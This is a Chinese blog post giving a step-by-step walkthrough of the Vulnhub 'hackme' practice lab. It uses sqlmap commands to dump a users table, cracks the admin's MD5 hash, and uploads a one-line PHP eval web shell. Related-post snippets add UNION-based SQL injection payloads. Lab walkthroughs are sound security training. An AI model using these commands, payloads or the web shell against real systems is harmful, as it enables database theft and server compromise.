Hackme靶场渗透攻略

已于 2024-09-03 19:11:21 修改
阅读量553 收藏 3
点赞数 15
文章标签: 安全
于 2024-09-03 19:10:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81881972/article/details/141867692
版权

步骤一,注册登录进去

步骤二,点击search

我们发现有很多书

步骤三,搜索一本书抓包发放到重放器

步骤四,数据改为1*,复制数据包到1.txt,然后打开sqlmap

步骤五,sqlmap查看当前数据库

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --current-db

步骤六,查表

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt -D webapphacking --tables

步骤七,查看users表的数据

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt -D webapphacking -T users --dump

步骤八,使用管理员账号登录

可以看到密码是被MD5加密的  

在线MD5网站进行解密 可以看到密码是Uncrackable

账号superadmin  密码为Uncrackable  登录成功

步骤九,上传一句话木马

<?php @eval($_POST['cmd']); ?>

shell.php上传成功

我们看可以看到上传的shell.php文件

步骤十,使用蚁剑连接

hackme(web wp)
Xi4or0uji
09-06 4461
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&amp;id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&amp;id=-1 union select 1,2,(select table_name fr...
Hackme靶机渗透
m0_50584370的博客
06-01 355
hackme靶机渗透
hackme靶场与Tomato靶场渗透测试实战
m0_59768231的博客
12-20 569
1、主机发现2.登录主页发现登录页面,而且还可以注册用户3. 点击 Sign up now 注册用户admin 密码1234564. 登录admin用户 单击search可以进行查看到很多的书名5. 验证sql注入 Windows OS' and 1=1#得到如图:验证出此处存在字符型(单引号)sql注入7. 判断字段数 Windows OS' order by 3#判断出来字段数是3个9.判断显示位置10. 查看当前数据库位置。
hackme靶机渗透~SQL注入+文件上传
weixin_67832625的博客
08-13 486
本文今天对hackerme这个靶机做了详细的介绍,主要是SQL注入和文件上传漏洞,难度适中,需要我们自习的对漏洞挖掘 ,最后提权的过程,有任何问题随时反馈作者
hackme 靶场复现
m0_68471358的博客
08-02 396
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透
HACKME-1 打靶
weixin_57315671的博客
06-16 354
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
渗透Vulnhub-hackme靶机
C-HOWE的博客
01-13 629
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解。
hackerme-靶机渗透
weixin_53736204的博客
07-29 452
靶场搭建下载好双击写好文件名路径。
hackme-1靶机渗透详解
weixin_63124284的博客
10-13 1302
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。这个实验室是为了模拟现实生活环境而创建的。
靶机渗透 HACKME-2 (详细渗透,适合新手渗透
君莫hacker的博客
09-06 4370
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
TryHackMe - Anonforce靶场
z4yn:)的博客
03-12 221
Anonforce boot2root machine for FIT and bsides guatemala CTF 目录 0x01 信息收集 0x02 USER Falg 0x03 gpg2jogn 破解密码 0x04 hashcat破解root hash 0x05 ROOT Flag 0x01 信息收集 先Nmap扫端口开放服务,结果只开放了21,22端口 FTP有个匿名登录,好家伙直接整个根目录放了上来 0x02 USER Falg 登录到ftp服务 ..
HACK ME靶机
qq_49101841的博客
10-01 1312
❀本篇关于信息安全实训时靶场训练的操作笔记。
HTTPS 协议:数据传输安全的坚实堡垒
ruanjiananquan99的博客
05-27 1274
在互联网技术飞速发展的今天,数据在网络中的传输无处不在。从日常浏览网页、在线购物,到企业间的数据交互,每一次信息传递都关乎着用户隐私、企业利益和网络安全。HTTP 协议作为互联网应用层的基础协议,曾经承担着数据传输的重任,但随着网络安全威胁的日益严峻,其不加密、易被窃取篡改的弊端逐渐暴露。而 HTTPS 协议在 HTTP 的基础上增加了 SSL/TLS 加密层,犹如为数据传输穿上了坚固的铠甲,能够对数据进行加密传输,确保数据在传输过程中的保密性、完整性和真实性,成为了保障网络安全的关键技术。​。
Redis最佳实践——安全与稳定性保障之连接池管理详解
最新发布
专注分享技术、实用优质教程、资源
06-01 1119
Redis最佳实践——安全与稳定性保障之连接池管理详解
数据分类分级的实践与反思:源自数据分析、治理与安全交叉视角的洞察
u010872591的博客
05-30 594
但若缺乏对两者特性与适用场景的深刻理解,以及精细化的融合策略设计(例如,如何有效仲裁规则与模型的冲突、如何实现两者间的知识迁移与能力互补),这种融合易陷入“简单叠加”的误区,可能导致系统复杂性剧增,可解释性与可控性下降,最终并未带来预期的价值提升。这一现象可能在许多类似规模的场景中复现。:基于向量空间相似度进行语义理解与判定,虽然在某些场景下表现出优势,但对于细粒度的行业专业术语、隐晦的业务逻辑关联以及跨领域、弱结构化的数据内容,其识别的精确度和稳定性仍有较大提升空间,甚至可能不如经过精细调优的传统规则。
安全生产例题
liangjiao_shou的博客
05-27 1200
安全生产例题
C++高级编程深度指南:内存管理、安全函数、递归、错误处理、命令行参数解析、可变参数应用与未定义行为规避
Rachelhi的博客
05-30 992
1. 可变参数 1.1 可变参数的定义与原理 1.2 使用可变参数的场景 1.3 可变参数的实现方式 1.3.1 省略号方式 1.3.2 模板参数包方式 2.2 动态内存分配函数 2.3 内存泄漏与内存溢出 3.1 错误处理机制概述 3.2 异常处理机制 示例代码 异常处理的优点 异常处理的缺点 3.3 错误处理的实践 使用异常处理机制 使用智能指针管理资源 使用RAII管理资源 使用断言进行调试 避免使用全局变量 使用日志记录错误信息 4.1 递归的定义与原理 示例代码:计算阶乘 示例代码:计算斐波那契数
联软SDP+安渡:收敛暴露面 从生产网自动取数 安全高效
leagsoft_1003的博客
05-28 1233
制造业网络安全面临网络隔离与数据流通的矛盾。为解决供应商跨网协作中的安全风险和管理痛点,联软推出安渡SDP解决方案:通过专用加密隧道实现安全访问,采用IP协议栈隔离、数据指令分离等创新技术,在不开放网络端口的情况下完成自动化数据摆渡。该方案既保障了文件传输的安全性,又提高了办公效率,实现了网络安全防护与业务便捷性的统一。典型应用于BOM系统审批后的图纸自动传输场景,有效规避U盘拷贝、即时通讯等传统方式的安全隐患。
变焦位移计:机器视觉如何克服人工疲劳与主观影响?精准对结构安全实时监测
weixin_43963569的博客
05-30 828
摘要: 变焦视觉位移监测相比传统人工监测具有显著优势。在精度上,自动化监测可达0.01mm,而人工监测受主观影响,精度仅几毫米。自动化可实现24小时高频监测,人工则耗时且滞后。自动化数据实时上传,真实可靠;人工数据易受人为干预。虽然自动化前期投入高,但长期成本效益更优。自动化监测在连续性、数据呈现等方面也优于人工监测。尽管人工监测在特定场景仍有价值,但自动化监测已成为行业发展趋势。
Lazysysadmin 靶场渗透测试实践指南
虽然缺乏详细信息,但我们可以推断它包含了至少两个文件:一个PDF文档来解释靶场的使用方法和规则,以及一个压缩包,其中可能包含执行靶场挑战所需的资源。靶场的使用对于信息安全培训来说是不可或缺的,它们通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值